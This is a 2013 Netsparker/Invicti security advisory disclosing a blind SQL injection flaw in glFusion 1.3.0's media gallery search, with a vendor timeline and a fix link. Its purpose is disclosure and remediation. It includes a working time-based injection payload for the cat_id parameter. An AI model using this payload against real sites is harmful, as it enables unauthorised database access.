SQL Injection Vulnerability in glFusion

Information

Advisory by Netsparker (now Invicti)
Name: SQL Injection Vulnerability in glFusion
Software: glFusion 1.3.0 and possibly below.
Vendor Homepage: http://www.glfusion.org
Vulnerability Type: Blind SQL Injection
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-13-009

Description

A dynamic system based on flexible and granular permissions, with spam protection, forums, file management, media gallery, calendars, polls, site-wide search, RSS feeds, and more!

Details

glFusion is affected by SQL Injection vulnerability in version 1.3.0. Example PoC url is as follows:

Blind SQL Injection Vulnerability

  • http://example.com/mediagallery/search.php
    POST – param:
    cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

You can read the full article about SQL Injection vulnerabilities from here:

Solution

http://www.glfusion.org/article.php/glfusion131

Advisory Timeline

05/09/2013 – First contact: No response
05/09/2013 – Vendor replied
05/09/2013 – Shared details
06/09/2013 – Fix released
09/09/2013 – Advisory Released

Credits

It has been discovered on testing of Invicti Web Application Security Scanner.

References

  1. MSL Advisory Link: /sql-injection-vulnerability-in-glfusion/
  2. Invicti Advisories: /web-applications-advisories/

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.